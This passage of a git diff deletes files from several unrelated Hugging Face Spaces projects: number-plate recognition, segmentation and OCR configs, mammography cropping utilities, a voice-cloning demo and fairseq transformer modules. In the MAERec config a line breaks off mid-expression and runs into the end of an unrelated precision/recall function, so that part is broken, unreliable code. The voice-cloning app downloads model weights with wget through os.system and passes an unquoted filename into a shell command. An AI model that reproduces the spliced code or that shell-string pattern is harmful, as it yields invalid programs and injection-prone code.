audio.extend(list(_audio)) - audio = (np.array(audio) * 32768.0).astype('int16') - return (self.hps.data.sampling_rate,audio) diff --git a/spaces/Mayanand/Automatic-Number-Plate-Recognition/main.py b/spaces/Mayanand/Automatic-Number-Plate-Recognition/main.py deleted file mode 100644 index 0696f3a906f8c746e53aace7fe56c7749996c960..0000000000000000000000000000000000000000 --- a/spaces/Mayanand/Automatic-Number-Plate-Recognition/main.py +++ /dev/null @@ -1,48 +0,0 @@ -from argparse import ArgumentParser -import os - -import cv2 -from detection import detect, read_image_with_resize, add_rect -from recognition import recognize, add_text - - -def extract_number_plate(image, box): - xmin, ymin, xmax, ymax = box - return image[ymin:ymax, xmin:xmax, :] - - -def read_number_plate(image): - orig_image = image - - boxes = detect(image) - - texts = [] - for box in boxes: - num_plate = extract_number_plate(orig_image, box) - text = recognize(num_plate) - texts.append(text) - return boxes, texts - - -if __name__ == "__main__": - parser = ArgumentParser() - parser.add_argument( - "--image", - default=None, - type=str, - help="path to image on which prediction will be made", - ) - - args = parser.parse_args() - - assert os.path.exists(args.image), f"given path {args.image} does not exists" - - im = read_image_with_resize(args.image) - - boxes, texts = 
read_number_plate(im) - print(texts) - for box, text in zip(boxes, texts): - im = add_rect(im, *box) - im = add_text(im, text, box) - - cv2.imwrite("result.jpg", im) diff --git a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/schedules/schedule_20k.py b/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/schedules/schedule_20k.py deleted file mode 100644 index bf780a1b6f6521833c6a5859675147824efa599d..0000000000000000000000000000000000000000 --- a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/schedules/schedule_20k.py +++ /dev/null @@ -1,9 +0,0 @@ -# optimizer -optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0005) -optimizer_config = dict() -# learning policy -lr_config = dict(policy='poly', power=0.9, min_lr=1e-4, by_epoch=False) -# runtime settings -runner = dict(type='IterBasedRunner', max_iters=20000) -checkpoint_config = dict(by_epoch=False, interval=2000) -evaluation = dict(interval=2000, metric='mIoU') diff --git a/spaces/MercurialAi/OncoMedleyMini/OncoMedley/GMIC/tools.py b/spaces/MercurialAi/OncoMedleyMini/OncoMedley/GMIC/tools.py deleted file mode 100644 index b86cd40bdec7dcbeda9cd228893e8c593243a38d..0000000000000000000000000000000000000000 --- a/spaces/MercurialAi/OncoMedleyMini/OncoMedley/GMIC/tools.py +++ /dev/null @@ -1,237 +0,0 @@ -""" -Defines utility functions for various tasks in GMIC. -""" -import numpy as np -import torch -from torch.autograd import Variable -import torch.nn.functional as F - -device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu') - -def partition_batch(ls, size): - """ - Partitions a list into buckets of given maximum length. - """ - i = 0 - partitioned_lists = [] - while i < len(ls): - partitioned_lists.append(ls[i: i+size]) - i += size - return partitioned_lists - - -def make_sure_in_range(val, min_val, max_val): - """ - Function that make sure that min < val < max; otherwise return the limit value - """ - if val < min_val: - return min_val - if val > max_val: - return max_val - return val - - -def crop(original_img, crop_shape, crop_position, method="center", - in_place=False, background_val="min"): - """ - Function that take a crop on the original image. - This function must staty in numpy since original_img should not be loaded into Pytorch during the network time. - original_img is large and would consume lots of GPU memory. 
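    The requested window is clamped to the image bounds; when a new array is returned
    (in_place=False), any out-of-range region is filled with the background value (the
    image minimum by default), so the result always has exactly crop_shape.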
- :param original_img: - :param crop_shape: - :param crop_position: - :param method: supported in ["center", "upper_left"] - :param in_place: if in_place, the effective pixels in the crop will be flagged (1.0) in the original_img - """ - # retrieve inputs - I, J = original_img.shape - crop_x, crop_y = crop_position - x_delta, y_delta = crop_shape - - # locate the four corners - if method == "center": - min_x = int(np.round(crop_x - x_delta / 2)) - max_x = int(np.round(crop_x + x_delta / 2)) - min_y = int(np.round(crop_y - y_delta / 2)) - max_y = int(np.round(crop_y + y_delta/2)) - elif method == "upper_left": - min_x = int(np.round(crop_x)) - max_x = int(np.round(crop_x + x_delta)) - min_y = int(np.round(crop_y)) - max_y = int(np.round(crop_y + y_delta)) - - # make sure that the crops are in range - min_x = make_sure_in_range(min_x, 0, I) - max_x = make_sure_in_range(max_x, 0, I) - min_y = make_sure_in_range(min_y, 0, J) - max_y = make_sure_in_range(max_y, 0, J) - - # if in_place, flag the original inputs - if in_place: - original_img[min_x:max_x, min_y:max_y] = 1.0 - # else make the new matrix - else: - # somehow background is normalized to this number - if background_val == "min": - output = np.ones(crop_shape) * np.min(original_img) - else: - output = np.ones(crop_shape) * background_val - real_x_delta = max_x - min_x - real_y_delta = max_y - min_y - origin_x = crop_shape[0] - real_x_delta - origin_y = crop_shape[1] - real_y_delta - output[origin_x:, origin_y:] = original_img[min_x:max_x, min_y:max_y] - return output - - -def get_crop_mask(loc, crop_shape, image_shape, method, indicator=True): - """ - Function that generates the mask - :param loc: - :param crop_shape: - :param image_shape: - :param method: - :return: - """ - crop_map = np.zeros(image_shape) - for crop_loc in loc: - # this is the indicator for point of crop - if indicator: - crop_map[int(crop_loc[0]), int(crop_loc[1])] = 999.0 - # fill in 1.0 in the cropped regions - crop(crop_map, crop_shape, crop_loc, method=method, in_place=True) - return crop_map - -def crop_pytorch_3d(original_img_pytorch, crop_shape, crop_position, out, - method="center", background_val="min"): - """ - Function that take a crop on the original image. - Use PyTorch to do this. 
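    The result is written in place into ``out``, which must already be allocated with
    shape (num_slices, crop_shape[0], crop_shape[1]); nothing is returned, and any
    out-of-range region keeps the background fill value.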
- :param original_img_pytorch: (C,H,W) PyTorch Tensor - :param crop_shape: (h, w) integer tuple - :param method: supported in ["center", "upper_left"] - :return: (N, K, C, h, w) PyTorch Tensor - """ - # retrieve inputs - num_slices_per_patch, H, W = original_img_pytorch.shape - crop_x, crop_y = crop_position - x_delta, y_delta = crop_shape - - # locate the four corners - if method == "center": - left_x = int(np.round(crop_x - x_delta / 2)) - right_x = int(np.round(crop_x + x_delta / 2)) - lower_y = int(np.round(crop_y - y_delta / 2)) - upper_y = int(np.round(crop_y + y_delta / 2)) - elif method == "upper_left": - left_x = int(np.round(crop_x)) - right_x = int(np.round(crop_x + x_delta)) - lower_y = int(np.round(crop_y)) - upper_y = int(np.round(crop_y + y_delta)) - - # make sure that the crops are in range - left_x = make_sure_in_range(left_x, 0, H) - right_x = make_sure_in_range(right_x, 0, H) - lower_y = make_sure_in_range(lower_y, 0, W) - upper_y = make_sure_in_range(upper_y, 0, W) - - # somehow background is normalized to this number - if background_val == "min": - out[:, :, :] = original_img_pytorch.min() - else: - out[:, :, :] = background_val - real_x_delta = right_x - left_x - real_y_delta = upper_y - lower_y - origin_x = crop_shape[0] - real_x_delta - origin_y = crop_shape[1] - real_y_delta - out[:, origin_x:, origin_y:] = original_img_pytorch[:, left_x:right_x, lower_y:upper_y] - -def get_max_window_3d(input_image, window_shape, pooling_logic="avg", return_max_values=False): - """ - Function that makes a sliding window of size window_shape over the - input_image and return the UPPER_LEFT corner index with max sum - :param input_image: N*C*H*W - :param window_shape: h*w - :return: N*C*2 - """ - N, C, H, W = input_image.size() - if pooling_logic == "avg": - # use average pooling to locate the window sums - pool_map = torch.nn.functional.avg_pool2d(input_image, window_shape, stride=1) - elif pooling_logic in ["std", "avg_entropy"]: - # create sliding windows - output_size = (H - window_shape[0] + 1, W - window_shape[1] + 1) - sliding_windows = F.unfold(input_image, kernel_size=window_shape).view(N, C, window_shape[0] * window_shape[1], - -1) - # apply aggregation function on each sliding windows - if pooling_logic == "std": - agg_res = sliding_windows.std(dim=2, keepdim=False) - elif pooling_logic == "avg_entropy": - agg_res = -sliding_windows * torch.log(sliding_windows) - (1 - sliding_windows) * torch.log( - 1 - sliding_windows) - agg_res = agg_res.mean(dim=2, keepdim=False) - # merge back - pool_map = F.fold(agg_res, kernel_size=(1, 1), output_size=output_size) - _, _, _, W_map = pool_map.size() - # transform to linear and get the index of the max val locations - max_values, max_linear_idx = torch.max(pool_map.view(N, C, -1), -1) - # convert back to 2d index - max_idx_x = max_linear_idx // W_map - max_idx_y = max_linear_idx - max_idx_x * W_map - # put together the 2d index - # Here X is pointing to height (upper), y to width (left) - upper_left_points = torch.cat([max_idx_x.unsqueeze(-1), max_idx_y.unsqueeze(-1)], dim=-1) - - if return_max_values: - return max_values, upper_left_points - return upper_left_points - -def generate_mask_uplft_3d(input_image, window_shape, upper_left_points, use_gpu=False, half=False): - """ - Function that generates mask that sets crops given upper_left - corners to 0 - :param input_image: - :param window_shape: - :param upper_left_points: - :return: - """ - N, C, H, W = input_image.size() - window_h, window_w = window_shape - # get the positions of 
masks - mask_x_min = upper_left_points[:, :, 0] - mask_x_max = upper_left_points[:, :, 0] + window_h - mask_y_min = upper_left_points[:, :, 1] - mask_y_max = upper_left_points[:, :, 1] + window_w - # generate masks - if use_gpu: - mask_x = Variable(torch.arange(0, H).cuda().view(-1, 1).repeat(N, C, 1, W)) - mask_y = Variable(torch.arange(0, W).cuda().view(1, -1).repeat(N, C, H, 1)) - else: - mask_x = Variable(torch.arange(0, H).view(-1, 1).repeat(N, C, 1, W)) - mask_y = Variable(torch.arange(0, W).view(1, -1).repeat(N, C, H, 1)) - - mask_x = mask_x.to(device) - mask_y = mask_y.to(device) - mask_x_min = mask_x_min.to(device) - mask_x_max = mask_x_max.to(device) - - x_gt_min = mask_x >= mask_x_min.unsqueeze(-1).unsqueeze(-1) - x_ls_max = mask_x < mask_x_max.unsqueeze(-1).unsqueeze(-1) - y_gt_min = mask_y >= mask_y_min.unsqueeze(-1).unsqueeze(-1) - y_ls_max = mask_y < mask_y_max.unsqueeze(-1).unsqueeze(-1) - - x_gt_min = x_gt_min.to(device) - x_ls_max = x_ls_max.to(device) - y_gt_min = y_gt_min.to(device) - y_ls_max = y_ls_max.to(device) - - # since logic operation is not supported for variable - # I used * for logic ANd - selected_x = x_gt_min * x_ls_max - selected_y = y_gt_min * y_ls_max - selected = selected_x * selected_y - if half: - return 1 - selected.half() - else: - return 1 - selected.float() - \ No newline at end of file diff --git a/spaces/Mountchicken/MAERec-Gradio/configs/textrecog/nrtr/_base_nrtr_modality-transform.py b/spaces/Mountchicken/MAERec-Gradio/configs/textrecog/nrtr/_base_nrtr_modality-transform.py deleted file mode 100644 index 5b21549f8ab62ae72988ef5ebbe13dee14d13ece..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/configs/textrecog/nrtr/_base_nrtr_modality-transform.py +++ /dev/null @@ -1,111 +0,0 @@ -dictionary = dict( - type='Dictionary', - dict_file='{{ fileDirname }}/../../../dicts/english_digits_symbols.txt', - with_padding=True, - with_unknown=True, - same_start_end=True, - with_start=True, - with_end=True) - -model = dict( - type='NRTR', - backbone=dict(type='NRTRModalityTransform'), - encoder=dict(type='NRTREncoder', n_layers=12), - decoder=dict( - type='NRTRDecoder', - module_loss=dict( - type='CEModuleLoss', ignore_first_char=True, flatten=True), - postprocessor=dict(type='AttentionPostprocessor'), - dictionary=dictionary, - max_seq_len=30), - data_preprocessor=dict( - type='TextRecogDataPreprocessor', - mean=[123.675, 116.28, 103.53], - std=[58.395, 57.12, 57.375])) - -train_pipeline = [ - dict(type='LoadImageFromFile', ignore_empty=True, min_size=2), - dict(type='LoadOCRAnnotations', with_text=True), - dict( - type='RescaleToHeight', - height=32, - min_width=32, - max_width=160, - width_divisor=4), - dict(type='PadToWidth', width=160), - dict( - type='PackTextRecogInputs', - meta_keys=('img_path', 'ori_shape', 'img_shape', 'valid_ratio')) -] - -test_pipeline = [ - dict(type='LoadImageFromFile'), - dict( - type='RescaleToHeight', - height=32, - min_width=32, - max_width=160, - width_divisor=16), - dict(type='PadToWidth', width=160), - # add loading annotation after ``Resize`` because ground truth - # does not need to do resize data transform - dict(type='LoadOCRAnnotations', with_text=True), - dict( - type='PackTextRecogInputs', - meta_keys=('img_path', 'ori_shape', 'img_shape', 'valid_ratio')) -] - -tta_pipeline = [ - dict(type='LoadImageFromFile'), - dict( - type='TestTimeAug', - transforms=[ - [ - dict( - type='ConditionApply', - true_transforms=[ - dict( - type='ImgAugWrapper', - args=[dict(cls='Rot90', k=0, 
keep_size=False)]) - ], - condition="results['img_shape'][1]= 0.0 - assert accum_hit_prec >= 0.0 - assert gt_num >= 0.0 - assert pred_num >= 0.0 - - if gt_num == 0: - recall = 1.0 - precision = 0.0 if pred_num > 0 else 1.0 - else: - recall = float(accum_hit_recall) / gt_num - precision = 0.0 if pred_num == 0 else float(accum_hit_prec) / pred_num - - denom = recall + precision - - hmean = 0.0 if denom == 0 else (2.0 * precision * recall / denom) - - return recall, precision, hmean diff --git a/spaces/MrBodean/VoiceClone/app.py b/spaces/MrBodean/VoiceClone/app.py deleted file mode 100644 index e7d616eafc6d08846c3658d71056405e50a65f38..0000000000000000000000000000000000000000 --- a/spaces/MrBodean/VoiceClone/app.py +++ /dev/null @@ -1,22 +0,0 @@ -import gradio as gr -import os -import shlex - -os.system('wget https://www.dropbox.com/s/luro5o8kjotkn70/synpretrained.pt') -os.system('wget https://www.dropbox.com/s/dv0ymnlqillecfw/encpretrained.pt') -os.system('wget https://www.dropbox.com/s/aiym2qfv7087bsc/vocpretrained.pt') -os.system('ls') - - -def inference(audio, text): - os.system("python demo_cli.py --no_sound --cpu --audio_path "+audio.name+" --text "+shlex.quote(text.strip())) - return 'demo_output_1.wav' - - -title = "Real-Time-Voice-Cloning" -description = "Gradio demo for Real-Time-Voice-Cloning: Clone a voice in 5 seconds to generate arbitrary speech in real-time. To use it, simply upload your audio, or click one of the examples to load them. Read more at the links below." -article = "

      Real-Time Voice Cloning | Github Repo

      " - -examples=[['test.wav',"This is real time voice cloning on huggingface spaces"]] -gr.Interface(inference, inputs=[gr.inputs.Audio(type="file"),"text"], outputs=gr.outputs.Audio(type="file"),enable_queue=True,title=title,description=description,article=article, examples=examples).launch() - diff --git a/spaces/NCTCMumbai/NCTC/models/official/vision/detection/dataloader/__init__.py b/spaces/NCTCMumbai/NCTC/models/official/vision/detection/dataloader/__init__.py deleted file mode 100644 index 931c2ef11db4a949e6c2e95bca44e36bac1241e9..0000000000000000000000000000000000000000 --- a/spaces/NCTCMumbai/NCTC/models/official/vision/detection/dataloader/__init__.py +++ /dev/null @@ -1,14 +0,0 @@ -# Copyright 2019 The TensorFlow Authors. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# ============================================================================== diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/rxf/rxf_src/__init__.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/rxf/rxf_src/__init__.py deleted file mode 100644 index 306e232d6f386b26153864601114e162080dcee4..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/rxf/rxf_src/__init__.py +++ /dev/null @@ -1,6 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from . import label_smoothed_cross_entropy_r3f, sentence_prediction_r3f # noqa diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/speech_recognition/test_data_utils.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/speech_recognition/test_data_utils.py deleted file mode 100644 index a72e0b66948da1349d87eafdef4c4004dd535c96..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/speech_recognition/test_data_utils.py +++ /dev/null @@ -1,62 +0,0 @@ -#!/usr/bin/env python3 -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
-import unittest - -import torch -from examples.speech_recognition.data import data_utils - - -class DataUtilsTest(unittest.TestCase): - def test_normalization(self): - sample_len1 = torch.tensor( - [ - [ - -0.7661, - -1.3889, - -2.0972, - -0.9134, - -0.7071, - -0.9765, - -0.8700, - -0.8283, - 0.7512, - 1.3211, - 2.1532, - 2.1174, - 1.2800, - 1.2633, - 1.6147, - 1.6322, - 2.0723, - 3.1522, - 3.2852, - 2.2309, - 2.5569, - 2.2183, - 2.2862, - 1.5886, - 0.8773, - 0.8725, - 1.2662, - 0.9899, - 1.1069, - 1.3926, - 1.2795, - 1.1199, - 1.1477, - 1.2687, - 1.3843, - 1.1903, - 0.8355, - 1.1367, - 1.2639, - 1.4707, - ] - ] - ) - out = data_utils.apply_mv_norm(sample_len1) - assert not torch.isnan(out).any() - assert (out == sample_len1).all() diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/model_parallel/modules/__init__.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/model_parallel/modules/__init__.py deleted file mode 100644 index 11603217a188f420ea849ae0fde19979736ba208..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/model_parallel/modules/__init__.py +++ /dev/null @@ -1,17 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. -"""isort:skip_file""" - -from .multihead_attention import ModelParallelMultiheadAttention -from .transformer_layer import ( - ModelParallelTransformerEncoderLayer, - ModelParallelTransformerDecoderLayer, -) - -__all__ = [ - "ModelParallelMultiheadAttention", - "ModelParallelTransformerEncoderLayer", - "ModelParallelTransformerDecoderLayer", -] diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_base.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_base.py deleted file mode 100644 index b4d5604dbbae979b424650882d33b45ebab323e6..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_base.py +++ /dev/null @@ -1,179 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from typing import Dict, List, Optional, Tuple - -import torch -import torch.nn as nn -from fairseq import utils -from fairseq.dataclass.utils import gen_parser_from_dataclass -from fairseq.distributed import fsdp_wrap -from fairseq.models import FairseqEncoderDecoderModel -from fairseq.models.transformer import ( - TransformerEncoderBase, - TransformerDecoderBase, - TransformerConfig, -) -from torch import Tensor - - -class TransformerModelBase(FairseqEncoderDecoderModel): - """ - Transformer model from `"Attention Is All You Need" (Vaswani, et al, 2017) - `_. - - Args: - encoder (TransformerEncoder): the encoder - decoder (TransformerDecoder): the decoder - - The Transformer model provides the following named architectures and - command-line arguments: - - .. argparse:: - :ref: fairseq.models.transformer_parser - :prog: - """ - - def __init__(self, cfg, encoder, decoder): - super().__init__(encoder, decoder) - self.cfg = cfg - self.supports_align_args = True - - @classmethod - def add_args(cls, parser): - """Add model-specific arguments to the parser.""" - # we want to build the args recursively in this case. 
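        # gen_parser_from_dataclass walks the TransformerConfig dataclass and registers
        # command-line arguments for its fields (with_prefix="" keeps the flat flag names).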
- gen_parser_from_dataclass( - parser, TransformerConfig(), delete_default=False, with_prefix="" - ) - - @classmethod - def build_model(cls, cfg, task): - """Build a new model instance.""" - - # -- TODO T96535332 - # bug caused by interaction between OmegaConf II and argparsing - cfg.decoder.input_dim = int(cfg.decoder.input_dim) - cfg.decoder.output_dim = int(cfg.decoder.output_dim) - # -- - - if cfg.encoder.layers_to_keep: - cfg.encoder.layers = len(cfg.encoder.layers_to_keep.split(",")) - if cfg.decoder.layers_to_keep: - cfg.decoder.layers = len(cfg.decoder.layers_to_keep.split(",")) - - src_dict, tgt_dict = task.source_dictionary, task.target_dictionary - - if cfg.share_all_embeddings: - if src_dict != tgt_dict: - raise ValueError("--share-all-embeddings requires a joined dictionary") - if cfg.encoder.embed_dim != cfg.decoder.embed_dim: - raise ValueError( - "--share-all-embeddings requires --encoder-embed-dim to match --decoder-embed-dim" - ) - if cfg.decoder.embed_path and ( - cfg.decoder.embed_path != cfg.encoder.embed_path - ): - raise ValueError( - "--share-all-embeddings not compatible with --decoder-embed-path" - ) - encoder_embed_tokens = cls.build_embedding( - cfg, src_dict, cfg.encoder.embed_dim, cfg.encoder.embed_path - ) - decoder_embed_tokens = encoder_embed_tokens - cfg.share_decoder_input_output_embed = True - else: - encoder_embed_tokens = cls.build_embedding( - cfg, src_dict, cfg.encoder.embed_dim, cfg.encoder.embed_path - ) - decoder_embed_tokens = cls.build_embedding( - cfg, tgt_dict, cfg.decoder.embed_dim, cfg.decoder.embed_path - ) - if cfg.offload_activations: - cfg.checkpoint_activations = True # offloading implies checkpointing - encoder = cls.build_encoder(cfg, src_dict, encoder_embed_tokens) - decoder = cls.build_decoder(cfg, tgt_dict, decoder_embed_tokens) - if not cfg.share_all_embeddings: - # fsdp_wrap is a no-op when --ddp-backend != fully_sharded - encoder = fsdp_wrap(encoder, min_num_params=cfg.min_params_to_wrap) - decoder = fsdp_wrap(decoder, min_num_params=cfg.min_params_to_wrap) - return cls(cfg, encoder, decoder) - - @classmethod - def build_embedding(cls, cfg, dictionary, embed_dim, path=None): - num_embeddings = len(dictionary) - padding_idx = dictionary.pad() - - emb = Embedding(num_embeddings, embed_dim, padding_idx) - # if provided, load from preloaded dictionaries - if path: - embed_dict = utils.parse_embedding(path) - utils.load_embedding(embed_dict, dictionary, emb) - return emb - - @classmethod - def build_encoder(cls, cfg, src_dict, embed_tokens): - return TransformerEncoderBase(cfg, src_dict, embed_tokens) - - @classmethod - def build_decoder(cls, cfg, tgt_dict, embed_tokens): - return TransformerDecoderBase( - cfg, - tgt_dict, - embed_tokens, - no_encoder_attn=cfg.no_cross_attention, - ) - - # TorchScript doesn't support optional arguments with variable length (**kwargs). - # Current workaround is to add union of all arguments in child classes. - def forward( - self, - src_tokens, - src_lengths, - prev_output_tokens, - return_all_hiddens: bool = True, - features_only: bool = False, - alignment_layer: Optional[int] = None, - alignment_heads: Optional[int] = None, - ): - """ - Run the forward pass for an encoder-decoder model. - - Copied from the base class, but without ``**kwargs``, - which are not supported by TorchScript. 
- """ - encoder_out = self.encoder( - src_tokens, src_lengths=src_lengths, return_all_hiddens=return_all_hiddens - ) - decoder_out = self.decoder( - prev_output_tokens, - encoder_out=encoder_out, - features_only=features_only, - alignment_layer=alignment_layer, - alignment_heads=alignment_heads, - src_lengths=src_lengths, - return_all_hiddens=return_all_hiddens, - ) - return decoder_out - - # Since get_normalized_probs is in the Fairseq Model which is not scriptable, - # I rewrite the get_normalized_probs from Base Class to call the - # helper function in the Base Class. - @torch.jit.export - def get_normalized_probs( - self, - net_output: Tuple[Tensor, Optional[Dict[str, List[Optional[Tensor]]]]], - log_probs: bool, - sample: Optional[Dict[str, Tensor]] = None, - ): - """Get normalized probabilities (or log probs) from a net's output.""" - return self.get_normalized_probs_scriptable(net_output, log_probs, sample) - - -def Embedding(num_embeddings, embedding_dim, padding_idx): - m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx) - nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5) - nn.init.constant_(m.weight[padding_idx], 0) - return m diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_encoder.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_encoder.py deleted file mode 100644 index f007776a6f3b7e6731edc01d95aa24eed255d0e8..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/transformer/transformer_encoder.py +++ /dev/null @@ -1,341 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math -from typing import Dict, List, Optional - -import torch -import torch.nn as nn -from fairseq import utils -from fairseq.distributed import fsdp_wrap -from fairseq.models import FairseqEncoder -from fairseq.modules import ( - FairseqDropout, - LayerDropModuleList, - LayerNorm, - PositionalEmbedding, - SinusoidalPositionalEmbedding, -) -from fairseq.modules import transformer_layer -from fairseq.modules.checkpoint_activations import checkpoint_wrapper -from fairseq.modules.quant_noise import quant_noise as apply_quant_noise_ -from torch import Tensor -from fairseq.models.transformer import ( - TransformerConfig, -) - - -# rewrite name for backward compatibility in `make_generation_fast_` -def module_name_fordropout(module_name: str) -> str: - if module_name == 'TransformerEncoderBase': - return 'TransformerEncoder' - else: - return module_name - - -class TransformerEncoderBase(FairseqEncoder): - """ - Transformer encoder consisting of *cfg.encoder.layers* layers. Each layer - is a :class:`TransformerEncoderLayer`. 
- - Args: - args (argparse.Namespace): parsed command-line arguments - dictionary (~fairseq.data.Dictionary): encoding dictionary - embed_tokens (torch.nn.Embedding): input embedding - """ - - def __init__(self, cfg, dictionary, embed_tokens): - self.cfg = cfg - super().__init__(dictionary) - self.register_buffer("version", torch.Tensor([3])) - - self.dropout_module = FairseqDropout( - cfg.dropout, module_name=module_name_fordropout(self.__class__.__name__) - ) - self.encoder_layerdrop = cfg.encoder.layerdrop - - embed_dim = embed_tokens.embedding_dim - self.padding_idx = embed_tokens.padding_idx - self.max_source_positions = cfg.max_source_positions - - self.embed_tokens = embed_tokens - - self.embed_scale = 1.0 if cfg.no_scale_embedding else math.sqrt(embed_dim) - - self.embed_positions = ( - PositionalEmbedding( - cfg.max_source_positions, - embed_dim, - self.padding_idx, - learned=cfg.encoder.learned_pos, - ) - if not cfg.no_token_positional_embeddings - else None - ) - if cfg.layernorm_embedding: - self.layernorm_embedding = LayerNorm(embed_dim, export=cfg.export) - else: - self.layernorm_embedding = None - - if not cfg.adaptive_input and cfg.quant_noise.pq > 0: - self.quant_noise = apply_quant_noise_( - nn.Linear(embed_dim, embed_dim, bias=False), - cfg.quant_noise.pq, - cfg.quant_noise.pq_block_size, - ) - else: - self.quant_noise = None - - if self.encoder_layerdrop > 0.0: - self.layers = LayerDropModuleList(p=self.encoder_layerdrop) - else: - self.layers = nn.ModuleList([]) - self.layers.extend( - [self.build_encoder_layer(cfg) for i in range(cfg.encoder.layers)] - ) - self.num_layers = len(self.layers) - - if cfg.encoder.normalize_before: - self.layer_norm = LayerNorm(embed_dim, export=cfg.export) - else: - self.layer_norm = None - - def build_encoder_layer(self, cfg): - layer = transformer_layer.TransformerEncoderLayerBase(cfg) - checkpoint = cfg.checkpoint_activations - if checkpoint: - offload_to_cpu = cfg.offload_activations - layer = checkpoint_wrapper(layer, offload_to_cpu=offload_to_cpu) - # if we are checkpointing, enforce that FSDP always wraps the - # checkpointed layer, regardless of layer size - min_params_to_wrap = cfg.min_params_to_wrap if not checkpoint else 0 - layer = fsdp_wrap(layer, min_num_params=min_params_to_wrap) - return layer - - def forward_embedding( - self, src_tokens, token_embedding: Optional[torch.Tensor] = None - ): - # embed tokens and positions - if token_embedding is None: - token_embedding = self.embed_tokens(src_tokens) - x = embed = self.embed_scale * token_embedding - if self.embed_positions is not None: - x = embed + self.embed_positions(src_tokens) - if self.layernorm_embedding is not None: - x = self.layernorm_embedding(x) - x = self.dropout_module(x) - if self.quant_noise is not None: - x = self.quant_noise(x) - return x, embed - - def forward( - self, - src_tokens, - src_lengths: Optional[torch.Tensor] = None, - return_all_hiddens: bool = False, - token_embeddings: Optional[torch.Tensor] = None, - ): - """ - Args: - src_tokens (LongTensor): tokens in the source language of shape - `(batch, src_len)` - src_lengths (torch.LongTensor): lengths of each source sentence of - shape `(batch)` - return_all_hiddens (bool, optional): also return all of the - intermediate hidden states (default: False). 
- token_embeddings (torch.Tensor, optional): precomputed embeddings - default `None` will recompute embeddings - - Returns: - dict: - - **encoder_out** (Tensor): the last encoder layer's output of - shape `(src_len, batch, embed_dim)` - - **encoder_padding_mask** (ByteTensor): the positions of - padding elements of shape `(batch, src_len)` - - **encoder_embedding** (Tensor): the (scaled) embedding lookup - of shape `(batch, src_len, embed_dim)` - - **encoder_states** (List[Tensor]): all intermediate - hidden states of shape `(src_len, batch, embed_dim)`. - Only populated if *return_all_hiddens* is True. - """ - return self.forward_scriptable( - src_tokens, src_lengths, return_all_hiddens, token_embeddings - ) - - # TorchScript doesn't support super() method so that the scriptable Subclass - # can't access the base class model in Torchscript. - # Current workaround is to add a helper function with different name and - # call the helper function from scriptable Subclass. - def forward_scriptable( - self, - src_tokens, - src_lengths: Optional[torch.Tensor] = None, - return_all_hiddens: bool = False, - token_embeddings: Optional[torch.Tensor] = None, - ): - """ - Args: - src_tokens (LongTensor): tokens in the source language of shape - `(batch, src_len)` - src_lengths (torch.LongTensor): lengths of each source sentence of - shape `(batch)` - return_all_hiddens (bool, optional): also return all of the - intermediate hidden states (default: False). - token_embeddings (torch.Tensor, optional): precomputed embeddings - default `None` will recompute embeddings - - Returns: - dict: - - **encoder_out** (Tensor): the last encoder layer's output of - shape `(src_len, batch, embed_dim)` - - **encoder_padding_mask** (ByteTensor): the positions of - padding elements of shape `(batch, src_len)` - - **encoder_embedding** (Tensor): the (scaled) embedding lookup - of shape `(batch, src_len, embed_dim)` - - **encoder_states** (List[Tensor]): all intermediate - hidden states of shape `(src_len, batch, embed_dim)`. - Only populated if *return_all_hiddens* is True. - """ - # compute padding mask - encoder_padding_mask = src_tokens.eq(self.padding_idx) - has_pads = src_tokens.device.type == "xla" or encoder_padding_mask.any() - - x, encoder_embedding = self.forward_embedding(src_tokens, token_embeddings) - - # account for padding while computing the representation - if has_pads: - x = x * (1 - encoder_padding_mask.unsqueeze(-1).type_as(x)) - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - - encoder_states 